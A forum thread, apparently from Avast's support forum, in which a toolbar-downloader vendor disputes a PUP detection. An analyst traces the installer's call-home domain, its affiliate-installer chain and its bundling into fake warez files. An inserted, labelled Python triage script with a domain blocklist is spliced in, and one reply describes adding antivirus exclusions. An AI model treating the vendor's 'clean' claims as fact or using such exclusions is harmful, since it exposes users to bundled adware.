I emailed virus [at] avast.com a few days ago to inquire about a false positive regarding a downloader. VirusTotal is showing that only Avast5 is flagging the downloader (Report: http://www.virustotal.com/file-scan/report.html?id=504ea5b7b4815d0ef8e9fb68245d14c800201ff7b3ed4f1cca7fbc31ea8cf0cd-1314820733 ) and I’d like to see what we can do to get it removed from being flagged. The downloader asks the user for consent and delivers a toolbar depending on which country your IP address is from. The toolbar delivered contains an uninstall via Add/Remove Programs and in the Start/Program Files menu as well. Our downloader has been clean from AVs/malware for almost a year until some of our users informed me of this. Is there a way to send our exe such that someone can review this, as I had no reply from the email address above?
You can send it in a password protected zip to virus@avast.com. Please, mention in the body of the message why you think it is a false positive and the password used. Thanks.
As a workaround, you can add these files to the Files Shield exclusion list.
Left click the ‘a’ orange icon, click on the Real-Time Shields folder at left > File Shield > Expert Settings > Exclusions > Add.
You can use wildcards like * and ?. But be careful: excluding that many files can leave your system in danger.
You can also add it to the general exclusion list (on demand scannings). Left click the ‘a’ orange icon, click on Settings button > Exclusions > Add.
If it’s a PUP, there’s no such thing as a false positive. The user can decide if he wants it or not. Generally said, this is a protection against small-print EULAs, default checkboxes and potential cripplewares (don’t know if it is exactly this case, haven’t checked it). But the mere word ‘toolbar’ rings a bell.
It’s just a downloader; the actual products being downloaded are all clean. The downloader asks the user if they wish to download or cancel. If they allow the download, it downloads and then presents the EULA/instructions. If they hit cancel, that’s it, it cancels. It’s a very simple download setup and we’ve never had it flagged in over a year, and it’s just Avast5 that’s flagging it. No replies from Avast since I uploaded it / emailed them.
The word PUP says it all: Possibly Unwanted Program. If you think it is unwanted, want to load it sandboxed or remove it completely from your computer, that decision rests with you, the user only. If you have installed it yourself and know why you downloaded and installed it, it cannot be a PUP. If it was installed without your knowledge, you might decide it is a PUP indeed. System admins may decide that you cannot install a PUP as a rule, a form of general policy. In that case, as a click-worker, you have to abide by that rule.
I don’t see how it’s an unwanted app; the user downloaded it, and we ask the user if they’re sure they want to install it and we give them the option to opt out. I can understand if the user doesn’t want a toolbar and considers it unwanted, but this is the downloader for the toolbars. The toolbars themselves are 100% clean, so doesn’t it make sense the downloader would be too? I can understand if the toolbar itself is flagged as a PUP, but not the downloader? Especially one that asks for permission and gives the option to abort at any time?
The detection is from 23rd Aug. We have exactly 0 hits of this detection in our statistics. This somehow contradicts what you say (users noticing). I’m not surprised; this is quite low profile, and also, PUPs are not the default.
Installer script contains a blocked URL: socialinstalls.com. This is some form of call home. The domain was blocked along with some black SEO operations.
ABOUT DOMAIN:
The domain has no contact info, and with or without www. redirects to two completely different weird-looking sites. No contact info there either.
Shares a server with now-pay.com, also no domain contact info.
chatsociety.com (red WOT) - Wired2000
profileprivacy.com (green WOT) - no domain contact info
ABOUT OTHER SAMPLES:
I see some filenames of software using this domain. The first is “avast profesional rar serials.exe”. Ehm.
I found one of the samples in our collections. It came as an 11 MB long file, under “Photoshop Windows” and “Call of Duty Black Ops”. Aside from the fact they can’t be only 11 MB, and can’t be in the same file, it contains only the script and ~11 MB of binary trash.
ABOUT YOUR SAMPLE:
The file you’ve sent to VT is almost the same - just the affiliate ID in the URL is different. You’ve used A2.
This then downloads some software contained on the socialinstalls site - in my case it was IMPF.exe.
IMPF.exe is again an NSIS installer which phones home, and then runs another NSIS installer, PhotoFun.exe.
This most probably means Iminent PhotoFun, and it’s from this site: hxxp://photofunapp.com. WOT grey, affiliate program, no company info or contact, domain info just “zy internet solutions”.
Now I’m tempted to change it from PUP to malware detection.
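The analyst’s triage above boils down to pulling the embedded call-home URL out of the installer script, checking its domain against a blocklist, and reading the affiliate/campaign IDs off the query string. The script below, added here as an illustration and not code from the thread or from Avast, does that over a constructed NSIS-style script fragment; the parameter names `cid` and `aff` and the blocklist contents are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for an NSIS installer script fragment; not the real file from the thread.
SAMPLE_SCRIPT = b"""
Name "Downloader"
Section
  inetc::get "http://socialinstalls.com/get.php?cid=140&aff=A2&src=A2" "$TEMP\\stage2.exe"
  ExecWait "$TEMP\\stage2.exe"
SectionEnd
"""

# Constructed blocklist; the thread reports socialinstalls.com as blocked by Avast.
BLOCKED_DOMAINS = {"socialinstalls.com"}

URL_RE = re.compile(rb"https?://[^\s\"'<>]+")


def extract_urls(data):
    """Return every http(s) URL embedded in the installer bytes."""
    return [m.group(0).decode("ascii", "replace") for m in URL_RE.finditer(data)]


def is_blocked(host):
    """Exact or subdomain match against the blocklist."""
    return host in BLOCKED_DOMAINS or any(host.endswith("." + d) for d in BLOCKED_DOMAINS)


def url_indicators(url):
    """Summarise one URL: host, block status, and tracking IDs (assumed parameter names)."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    qs = parse_qs(parts.query)
    return {
        "host": host,
        "blocked": is_blocked(host),
        "campaign": qs.get("cid", [None])[0],   # campaign ID, e.g. 140 in the thread
        "affiliate": qs.get("aff", [None])[0],  # affiliate/tracking source, e.g. A2
    }


def triage(data):
    """Run the checks over every URL found in the installer bytes."""
    return [url_indicators(u) for u in extract_urls(data)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_SCRIPT):
        print(hit)
```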
About the domain: SocialInstalls is the URL used to determine which installer you’ll get. Depending on your country of origin, you will get a different toolbar. Cookies are also used to determine the number of times we’ve seen the user. I have no idea what this now-pay.com domain is; we don’t share IPs and have dedicated IPs. The domains chatsociety and profileprivacy are default redirectors that are used when the installer fails to determine your intended product. The installer makes a request attached with a few parameters to determine what the intended product was (a downloader, an IM tool, language translation, etc.). Without these parameters, we redirect to a default landing page since we don’t know what you were looking for.
“avast profesional rar serials.exe”, “Photoshop Windows” and “Call of Duty Black Ops”: I have no idea what these are or why they’re 11 megs. Our installer is less than 50 KB, and they’re not originating from our socialinstalls domain name as far as I can tell. Sounds like someone is attaching our binary to something else, but our binary is clean.
PhotoFun and Iminent IMBooster are packaged together as a request for an IM package; this sounds like you ran the software with campaign ID 140 and tracking source “A” or “A2”. But nevertheless, I don’t see how this is malware. It sounds like the exes you found came from someone else and have our exe included in the package, as our exe is just 50 KB, not 11 meg, and I have no idea why they’re called those names like Photoshop or Call of Duty.